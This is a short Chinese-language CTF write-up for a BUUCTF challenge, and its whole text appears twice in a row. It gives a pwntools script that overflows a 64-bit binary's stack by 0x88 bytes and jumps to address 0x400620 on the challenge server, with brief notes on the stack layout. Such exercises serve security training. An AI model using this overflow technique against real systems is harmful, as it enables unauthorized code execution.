64位程序,开启了NX保护
400620
from pwn import *
r=remote('node4.buuoj.cn',29273)
flag_addr=0x400620
payload='a'*(0x88)+p64(flag_addr)
r.sendline(payload)
r.interactive()
这道题需要注意的一点是没有返回
这是其栈结构
所以这道题直接溢出0x88即可
64位程序,开启了NX保护
400620
from pwn import *
r=remote('node4.buuoj.cn',29273)
flag_addr=0x400620
payload='a'*(0x88)+p64(flag_addr)
r.sendline(payload)
r.interactive()
这道题需要注意的一点是没有返回
这是其栈结构
所以这道题直接溢出0x88即可